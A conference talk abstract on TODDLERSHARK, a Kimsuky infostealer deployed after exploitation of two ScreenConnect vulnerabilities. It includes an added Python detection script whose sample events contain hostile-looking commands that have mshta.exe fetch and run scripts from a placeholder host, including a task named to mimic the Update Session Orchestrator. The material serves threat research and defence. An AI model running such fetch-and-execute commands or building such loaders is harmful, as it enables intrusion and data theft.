TODDLERSHARK: Kimsuky's Hastily Built Variant of BABYSHARK Deployed Using a 1-Day Exploit
10-25, 14:30–15:00 (Europe/Luxembourg), Europe - Main Room

The Kroll Cyber Threat Intelligence (CTI) team discovered new malware resembling the VBScript-based BABYSHARK malware, which we have called TODDLERSHARK.

The malware was used in post-compromise activity following exploitation of two vulnerabilities in ScreenConnect, which were responsibly disclosed by a Kroll analyst but were quickly weaponised after details of the vulnerabilities were published.

BABYSHARK has been associated, by several sources, with a threat actor Kroll tracks as KTA082 (Kimsuky).

The malware utilized a legitimate Microsoft-signed binary and alternate data streams, and exhibited elements of polymorphic behaviour.

This talk will detail how the exploits work, how Kimsuky was able to quickly operationalize an n-day vulnerability, a teardown of TODDLERSHARK, and how simple detection methods were able to stop an APT group.


Two critical vulnerabilities, tracked as CVE-2024-1708 and CVE-2024-1709, allow an unauthenticated threat actor to take administrative control of a ConnectWise ScreenConnect portal, including accessing additional endpoints and executing code via a path traversal vulnerability; they are trivial to exploit. The vulnerabilities were discovered by a Kroll analyst and responsibly disclosed.

CVE-2024-1709 (CVSS:10) allows authentication bypass due to insufficient path filtering: any string can be appended after the extension, which allows the check to be bypassed.

CVE-2024-1708 (CVSS:8.4) is a path traversal vulnerability that allows an attacker to execute code remotely on the ScreenConnect server.

Together, CVE-2024-1709 and CVE-2024-1708 can allow a threat actor to perform remote code execution post authentication.

These vulnerabilities quickly saw widespread exploitation by multiple threat groups, ranging from attackers deploying simple coinminers, through ransomware, to what Kroll assesses to be nation-state activity.

TODDLERSHARK Discovery

The Kroll CTI team observed a campaign using a new malware that appears to be very similar to BABYSHARK, previously reported to have been developed and used by the APT group KTA082.

The malware was deployed as part of an attempted compromise that was detected and stopped by the Kroll Responder team. The activity started with exploitation of CVE-2024-1709 and CVE-2024-1708. The threat actor then leveraged their now "hands on keyboard" access to use cmd.exe to execute mshta.exe with a URL pointing to the Visual Basic (VB) based malware, which Kroll dubbed TODDLERSHARK. Kroll was able to stop the intrusion before any follow-on activity was conducted by the threat actor; it is therefore hard to assess

TODDLERSHARK is a Visual Basic Script (VBS) based malware usually executed via the Microsoft-signed binary mshta.exe. Its main purpose is to act as an information stealer: it gathers detailed information on the victim machine, the victim user, and the victim network.

It is installed by calling mshta.exe with a URL parameter via command prompt or PowerShell, which allows the actor to generate payloads server-side each time it is run. This allows for unique obfuscation and junk code with each download. It does this for both its initial script component and the infostealer component which that script downloads separately. This gives the malware a polymorphic behaviour, as every file hash will be different and any strings that do remain the same will be in different positions.

Finally, the malware sets up a scheduled task which appears designed to act more like a loader, as it tries to download and execute from a URL every minute. In one deployment the actor named the scheduled task "Uso1Cache"; this is likely a ploy to make the task appear to be part of the legitimate "Update Session Orchestrator", a Windows component that handles installing updates.
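The abstract closes by noting that simple detection methods stopped the intrusion. The following is an added example (not Kroll's code, and not derived from the talk's own detection content) of what such detection logic can look like for the two behaviours described above: mshta.exe launched from cmd.exe or PowerShell with a URL as its argument, and a scheduled task with a USO-lookalike name that re-fetches a URL on a minute-level cadence. The event records are constructed here in a Sysmon-like shape; the field names, the placeholder host `stager.example.invalid` and the severity thresholds are assumptions, not a vendor schema or real indicators.

```python
"""Heuristics for the TODDLERSHARK delivery chain: mshta.exe fed a URL from an
interactive shell, and a URL-fetching scheduled task masquerading as the
Update Session Orchestrator. Added example; event shape is an assumption."""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

URL_RE = re.compile(r"\bhttps?://[^\s\"']+", re.IGNORECASE)
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Genuine USO tasks live under \Microsoft\Windows\UpdateOrchestrator;
# a USO-sounding name anywhere else is worth a look.
USO_PATH = "\\microsoft\\windows\\updateorchestrator\\"


@dataclass
class ProcessEvent:
    image: str          # full path of the started process
    command_line: str
    parent_image: str


@dataclass
class TaskEvent:
    task_path: str        # e.g. "\\Uso1Cache"
    action: str           # program the task runs
    arguments: str
    interval_minutes: int  # repetition interval of the trigger (0 = none)


@dataclass
class Finding:
    rule: str
    detail: str


def basename(path: str) -> str:
    """Last path component, lower-cased, tolerant of either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process(ev: ProcessEvent) -> Optional[Finding]:
    """mshta.exe given a URL argument; higher severity when a shell spawned it."""
    if basename(ev.image) != "mshta.exe":
        return None
    url = URL_RE.search(ev.command_line)
    if not url:
        return None
    parent = basename(ev.parent_image)
    sev = "high" if parent in SHELL_PARENTS else "medium"
    return Finding("mshta_remote_url", f"{sev}: {parent} -> mshta.exe {url.group(0)}")


def check_task(ev: TaskEvent) -> Optional[Finding]:
    """Script host run against a URL on a tight repeat interval, and/or under a
    name imitating the Update Session Orchestrator outside its real folder."""
    if basename(ev.action) not in SCRIPT_HOSTS or not URL_RE.search(ev.arguments):
        return None
    reasons = []
    if 0 < ev.interval_minutes <= 5:
        reasons.append(f"repeats every {ev.interval_minutes} min")
    if "uso" in basename(ev.task_path) and USO_PATH not in ev.task_path.lower():
        reasons.append("USO-lookalike name outside the UpdateOrchestrator folder")
    if not reasons:
        return None
    return Finding("scheduled_task_url_loader", f"{ev.task_path}: " + "; ".join(reasons))


def scan(events: List[Union[ProcessEvent, TaskEvent]]) -> List[Finding]:
    """Run the matching check over each event and collect the hits."""
    out: List[Finding] = []
    for ev in events:
        f = check_process(ev) if isinstance(ev, ProcessEvent) else check_task(ev)
        if f:
            out.append(f)
    return out


# Constructed sample telemetry (placeholder host and URL, not real IoCs).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\System32\mshta.exe",
                 "mshta.exe http://stager.example.invalid/init",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\mshta.exe",          # benign local HTA
                 r'mshta.exe "C:\Program Files\Vendor\setup.hta"',
                 r"C:\Program Files\Vendor\installer.exe"),
    TaskEvent(r"\Uso1Cache", r"C:\Windows\System32\mshta.exe",
              "http://stager.example.invalid/stage2", 1),
    TaskEvent(r"\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker",  # genuine
              r"%systemroot%\system32\MusNotification.exe", "", 0),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding.rule, "|", finding.detail)
```

Running the block on the constructed sample flags only the shell-spawned mshta.exe launch and the "Uso1Cache" task; the vendor-installed local HTA and the genuine USO task produce no finding. In a real deployment the process check would sit on process-creation telemetry and the task check on scheduled-task creation or enumeration output, with the interval threshold tuned to the environment.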

George Glass is an associate managing director and EMEA lead in the Kroll Cyber Threat Intelligence team, based in London. George has more than eight years’ experience in building, deploying and operationalizing on-premise and cloud-based technologies and has a proven track record for optimizing and automating operations to reduce detection and response times.

He delivers analysis on vulnerabilities, malware and threat actors to hundreds of clients, including FTSE 50 companies, ensuring detection of the latest threats across multiple security information and event management (SIEM) and endpoint detection and response (EDR) solutions.